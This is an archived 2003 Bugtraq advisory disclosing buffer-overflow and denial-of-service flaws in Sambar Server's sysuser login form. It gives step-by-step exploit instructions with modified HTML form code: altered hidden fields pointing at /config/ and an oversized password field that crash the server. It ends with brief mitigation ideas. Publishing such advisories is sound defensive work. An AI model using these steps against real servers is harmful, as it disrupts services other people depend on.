lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030331185246.14856.qmail@www.securityfocus.com>
Date: 31 Mar 2003 18:52:46 -0000
From: Lorenzo Manuel Hernandez Garcia-Hierro <security@...enzohgh.com>
To: bugtraq@...urityfocus.com
Subject: Sambar Server "Buffer OverFlow" Vulnerabilities




**** THE SAMBAR SERVER BUFFER OVERFLOW IN SYSUSER LOGIN SYSTEM *****

RISK ( by mine) : 7 (1/10)
SYSTES AFFECTED: All Sambar Server systems with sysuser login included.
VULNERABILITIES: 2 KNOWN ( can be more)
DESCRIPTION:

This vulnerability is caused because the form that the Sambar Server 
demon doesn't  examinates the buffer and sizes of the login form 
transfer, the only protection for the server is the values at the form in 
the html code ( the max value of the RCPassword input) , this can be a 
vulnerability if the server is public-exposed and the directories of the 
sysuser is known.

METHOD TO XPLOIT IT:

You must be sure and known the true path (at sambar root like c:\sambar ) 
of the sysuser login form, now follow this easy steps:

1st: go to the webserver sysuser login form path , like 
http://localhost/sysuser/index.stm (you must specify the index.stm for 
the RPC called locally trough index.stm ).

2nd: copy and paste the code of the form ( total page ) and paste it in a 
blank text field , rename to a something.html .

3th: put in the correct fields the http://localhost or url for your 
sambar server installation ,this is for the form and images , of course, 
the form must be connect to the correct url address of the server script.
The code goes like here:
[FORM METHOD=POST ACTION="http://localhost/session/login" 
onsubmit="return FormValidator(this)"]
[INPUT TYPE=hidden NAME="RCpage" 
VALUE="http://localhost/sysuser/desktop.stm"]*This is your desktop 
installation.
[INPUT TYPE=hidden NAME="onfailure" 
VALUE="http://localhost/sysuser/relogin.stm"]*you can modify this to more 
buffer over flow like to a cgi script (this can be a DoS attack
[INPUT TYPE=hidden NAME="start" VALUE=1>
[INPUT TYPE=hidden NAME="RCSdesktop" VALUE="true"]
[INPUT TYPE=hidden NAME="RCSsort" VALUE="desc"]
[INPUT TYPE=hidden NAME="RCSstyle" VALUE="txtconvert"]
[INPUT TYPE=hidden NAME="RCSwrap" VALUE="60"]
[INPUT TYPE=hidden NAME="RCScount" VALUE="25]
[INPUT TYPE=hidden NAME="RCSfolder" VALUE="inbox"]
[INPUT TYPE=hidden NAME="RCSpath" VALUE="/]
[INPUT TYPE=hidden NAME="RCShome" VALUE="/config/] *This is the problem!*
[INPUT TYPE=hidden NAME="RCSbrowse" VALUE="/config/"]*This is the problem!
*
[INPUT TYPE=hidden NAME="RCSsortby" VALUE="name]

4th: now you can try to refresh and login , use a valid user and password 
if you want to prove the vulnerability number one or go to the 6th step!

5th: now you must push on the submit button , wait , and if you are 
running the server on your computer the server pick up and becomes 
unstable , if you continue sending this attemps the server must be 
restarted or the computer restarted during the attack!.

6th: the second vulnerability is the bffer overflow in form fields of 
password ( you can learn more about this in the advisory of 
Allaire 'ColdFusion Buffer OverFlow in form fields') , you can insert 
more than million of characters and submit it but you must edit the form 
code in your computer:
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="" MAXLENGTH=40]< change this 
to...
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="here put your text, more than 
hundred thousand  characters"]
and..........
7th: push on submit and the server pick up too!

SOLUTION:

I don't know a completly solutions because this vulnerability is the 
ancient and older type of vulnerability and the only possible solution 
is...

- Change the path and directory of the sambar server user files!
- the developers of sambar server can change the code and develop a 
module for examine the trafic of user files and buffers of form transfer 
in POST or GET mode.


CONTACT:
NAME: Lorenzo Hernandez Garcia-Hierro
MAIL: security@...enzohgh.com
WEBSITE: www.lorenzohgh.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ